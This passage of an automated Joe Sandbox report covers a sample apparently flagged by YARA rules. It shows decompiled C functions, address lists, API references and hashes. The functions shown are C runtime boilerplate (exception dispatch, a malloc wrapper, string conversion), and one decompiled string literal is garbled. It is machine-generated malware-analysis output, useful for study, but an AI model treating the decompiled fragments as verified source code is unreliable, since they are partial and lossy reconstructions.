                                                                                0x0040f3a9
                                                                                0x0040f3a9
                                                                                0x0040f3b4
                                                                                0x0040f3b4
                                                                                0x0040f3b7
                                                                                0x0040f3bc
                                                                                0x0040f3bf
                                                                                0x0040f3c2
                                                                                0x0040f3c9
                                                                                0x0040f3ce
                                                                                0x0040f3ce
                                                                                0x00000000
                                                                                0x0040f38e
                                                                                0x0040f38e
                                                                                0x0040f38f
                                                                                0x0040f38f
                                                                                0x0040f390
                                                                                0x00000000
                                                                                0x0040f390

                                                                                APIs
                                                                                • __CxxThrowException@8.LIBCMT ref: 0040F390
                                                                                • std::exception::exception.LIBCMT ref: 0040F3B7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                                • String ID: P$D
                                                                                • API String ID: 3728558374-329552781
                                                                                • Opcode ID: 07db952bb3cb9e1d33ff292a20637aa54269c0dc372f6a05b6cfd29461628bbf
                                                                                • Instruction ID: 8b36795022dd307ea32d0961d62ad3ba83685b3f6d8194d547ff1d516d34f0e2
                                                                                • Opcode Fuzzy Hash: 07db952bb3cb9e1d33ff292a20637aa54269c0dc372f6a05b6cfd29461628bbf
                                                                                • Instruction Fuzzy Hash: B70167B1800304EADB10DF65C5465EA7BB4AE04398725807BAC09AB651D77CDA8B87DA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 86%
                                                                                			E004235A5(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                                                                                				intOrPtr _t17;
                                                                                				intOrPtr* _t28;
                                                                                				void* _t29;
                                                                                
                                                                                				_t28 = __esi;
                                                                                				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                                                                                				E004218C3(__ebx, __edx, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
                                                                                				 *((intOrPtr*)(E00427B66(__edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                                                                                				_t17 = E00427B66(__edx, __edi, __eflags);
                                                                                				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                                                                                				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                                                                                					_t17 =  *((intOrPtr*)(__esi + 0x14));
                                                                                					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                                                                                						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
                                                                                							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
                                                                                							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                                                                                								_t17 = E0042189C(_t37,  *((intOrPtr*)(_t28 + 0x18)));
                                                                                								_t38 = _t17;
                                                                                								if(_t17 != 0) {
                                                                                									_push( *((intOrPtr*)(_t29 + 0x10)));
                                                                                									_push(_t28);
                                                                                									return E0042332C(_t38);
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t17;
                                                                                			}






                                                                                0x004235a5
                                                                                0x004235a8
                                                                                0x004235ae
                                                                                0x004235bc
                                                                                0x004235c2
                                                                                0x004235ca
                                                                                0x004235d6
                                                                                0x004235de
                                                                                0x004235e6
                                                                                0x004235fa
                                                                                0x004235fc
                                                                                0x00423600
                                                                                0x00423605
                                                                                0x0042360b
                                                                                0x0042360d
                                                                                0x0042360f
                                                                                0x00423612
                                                                                0x00000000
                                                                                0x00423619
                                                                                0x0042360d
                                                                                0x00423600
                                                                                0x004235fa
                                                                                0x004235e6
                                                                                0x0042361a

                                                                                APIs
                                                                                  • Part of subcall function 004218C3: __getptd.LIBCMT ref: 004218C9
                                                                                  • Part of subcall function 004218C3: __getptd.LIBCMT ref: 004218D9
                                                                                • __getptd.LIBCMT ref: 004235B4
                                                                                  • Part of subcall function 00427B66: __getptd_noexit.LIBCMT ref: 00427B69
                                                                                  • Part of subcall function 00427B66: __amsg_exit.LIBCMT ref: 00427B76
                                                                                • __getptd.LIBCMT ref: 004235C2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                • String ID: csm
                                                                                • API String ID: 803148776-1018135373
                                                                                • Opcode ID: 7498bb2d42a279d00827fb68dc5e25441d99e1685884e4f95cd15346bb64ca00
                                                                                • Instruction ID: 065e5224e706152be8a24a8500039992b796e4889236b2196d4c28aee3306f25
                                                                                • Opcode Fuzzy Hash: 7498bb2d42a279d00827fb68dc5e25441d99e1685884e4f95cd15346bb64ca00
                                                                                • Instruction Fuzzy Hash: A0012C34A01225AACF349F61E440A6EB7B9AF10316F94442FE481563A1CB7D9E81CA6D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00C7372B: __getptd.LIBCMT ref: 00C73731
                                                                                  • Part of subcall function 00C7372B: __getptd.LIBCMT ref: 00C73741
                                                                                • __getptd.LIBCMT ref: 00C7C0F9
                                                                                  • Part of subcall function 00C771DA: __getptd_noexit.LIBCMT ref: 00C771DD
                                                                                  • Part of subcall function 00C771DA: __amsg_exit.LIBCMT ref: 00C771EA
                                                                                • __getptd.LIBCMT ref: 00C7C107
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                • String ID: csm
                                                                                • API String ID: 803148776-1018135373
                                                                                • Opcode ID: 90b0284b966645cfb4c0733fa0c2a899ac638c4b2b33f9f58db1b17bb52fe2ec
                                                                                • Instruction ID: 419f113286d394425081abf338914eb13016cf72f3793188518da132dc6f6f29
                                                                                • Opcode Fuzzy Hash: 90b0284b966645cfb4c0733fa0c2a899ac638c4b2b33f9f58db1b17bb52fe2ec
                                                                                • Instruction Fuzzy Hash: B30128748012068BCF289F24D581AADB7B5AF10311F94D82DE86C56253DB30DE85EB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • std::bad_exception::bad_exception.LIBCMTD ref: 00C70A60
                                                                                  • Part of subcall function 00C63CF0: std::runtime_error::runtime_error.LIBCPMTD ref: 00C63CFE
                                                                                • __CxxThrowException@8.LIBCMT ref: 00C70A6E
                                                                                  • Part of subcall function 00C733AB: RaiseException.KERNEL32(?,?,00C7316D,00C71293,?,?,?,?,00C7316D,00C71293,00DAB120,00DAD428,00C71293,00000000,00000000), ref: 00C733ED
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
                                                                                • String ID: vector<T> too long
                                                                                • API String ID: 212174158-3788999226
                                                                                • Opcode ID: 0b01444175902f4e38a3bd2c4b55bae1d17f15b0e54877f109ac4627e2ac152a
                                                                                • Instruction ID: 5f95a70504eabf9aee7aeba7f3baa0010bc4aa79a6d316ceb31e9a84414df679
                                                                                • Opcode Fuzzy Hash: 0b01444175902f4e38a3bd2c4b55bae1d17f15b0e54877f109ac4627e2ac152a
                                                                                • Instruction Fuzzy Hash: A6F0AF71810648ABCB10DFD0DD82B9EB778FB01720F00472DF412672C0EB306A08CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 58%
                                                                                			E00404007(void* __ecx, void* __edi, void* __esi) {
                                                                                				signed int _v8;
                                                                                				char _v20;
                                                                                				void* _t8;
                                                                                				void* _t14;
                                                                                				void* _t18;
                                                                                
                                                                                				_t8 = 0;
                                                                                				if(__ecx != 0) {
                                                                                					_t22 = __ecx - 0x7fffffff;
                                                                                					if(__ecx > 0x7fffffff) {
                                                                                						L3:
                                                                                						_v8 = _v8 & 0x00000000;
                                                                                						E0041E15E( &_v20,  &_v8);
                                                                                						_v20 = 0x43834c;
                                                                                						return E00421126( &_v20, "h\xef\xbf\					}
                                                                                					_t8 = E0041EB16(_t14, _t18, __edi, __esi, _t22, __ecx + __ecx);
                                                                                					if(0 == 0) {
                                                                                						goto L3;
                                                                                					}
                                                                                				}
                                                                                				return _t8;
                                                                                			}








                                                                                0x0040400d
                                                                                0x00404011
                                                                                0x00404013
                                                                                0x00404019
                                                                                0x00404029
                                                                                0x00404029
                                                                                0x00404034
                                                                                0x00404042
                                                                                0x00000000
                                                                                0x00404049
                                                                                0x0040401f
                                                                                0x00404027
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404027
                                                                                0x0040404f

                                                                                APIs
                                                                                • std::exception::exception.LIBCMT ref: 00404034
                                                                                • __CxxThrowException@8.LIBCMT ref: 00404049
                                                                                  • Part of subcall function 0041EB16: _malloc.LIBCMT ref: 0041EB30
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                • String ID: hAD
                                                                                • API String ID: 4063778783-4020614360
                                                                                • Opcode ID: ef50aa0d5531f934dc069faca0b00111cb2420a90fb0de7e891e2ced0e2482ba
                                                                                • Instruction ID: 4abb3becd7b6b56fa68245c00a87f07a767a513609678ce51b05836b1298f837
                                                                                • Opcode Fuzzy Hash: ef50aa0d5531f934dc069faca0b00111cb2420a90fb0de7e891e2ced0e2482ba
                                                                                • Instruction Fuzzy Hash: C1E092B490021A96DB10F7A5CD02AEF73BC6F44328F60056FE621F35C1EFB8D6058699
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00419C2F(void* __eflags, CHAR* _a4) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t26;
                                                                                				void* _t28;
                                                                                				short* _t29;
                                                                                				int _t31;
                                                                                				CHAR* _t32;
                                                                                				void* _t33;
                                                                                
                                                                                				_t33 = __eflags;
                                                                                				_t32 = _a4;
                                                                                				_t31 = MultiByteToWideChar(0, 0, _t32, lstrlenA(_t32), 0, 0);
                                                                                				_t26 = 2;
                                                                                				_t2 = _t31 + 1; // 0x1
                                                                                				_t29 = E0041EB16(lstrlenA, _t2 * _t26 >> 0x20, _t28, _t31, _t33,  ~(0 | _t33 > 0x00000000) | _t2 * _t26);
                                                                                				MultiByteToWideChar(0, 0, _t32, lstrlenA(_t32), _t29, _t31);
                                                                                				_t29[_t31] = 0;
                                                                                				return _t29;
                                                                                			}












                                                                                0x00419c2f
                                                                                0x00419c37
                                                                                0x00419c4e
                                                                                0x00419c54
                                                                                0x00419c55
                                                                                0x00419c69
                                                                                0x00419c75
                                                                                0x00419c7d
                                                                                0x00419c87

                                                                                APIs
                                                                                • lstrlenA.KERNEL32(00440C98,00000000,00000000,00440C98,?,?,00000000,0041C671,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00440C98), ref: 00419C42
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00440C98,00000000,?,00000000,0041C671,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00440C98,?), ref: 00419C48
                                                                                  • Part of subcall function 0041EB16: _malloc.LIBCMT ref: 0041EB30
                                                                                • lstrlenA.KERNEL32(00440C98,00000000,00000000,?,00000000,0041C671,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00440C98,?,0041CC7B), ref: 00419C6D
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00440C98,00000000,?,00000000,0041C671,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00440C98,?), ref: 00419C75
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWidelstrlen$_malloc
                                                                                • String ID:
                                                                                • API String ID: 478923669-0
                                                                                • Opcode ID: 8f61b424d6165e82e86f9827afb85f91beb2be794cc9e8135f4c3884e5a8dc00
                                                                                • Instruction ID: bd6b4f08c05a39c93edd4c3188b159cc0bbd8dc5c1d7c33d4e998ae2d02428cf
                                                                                • Opcode Fuzzy Hash: 8f61b424d6165e82e86f9827afb85f91beb2be794cc9e8135f4c3884e5a8dc00
                                                                                • Instruction Fuzzy Hash: 8AF054772012147FD224573A9C49F7BBB9CDF856B1F01412AFA0AC6180D9217C0482B4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%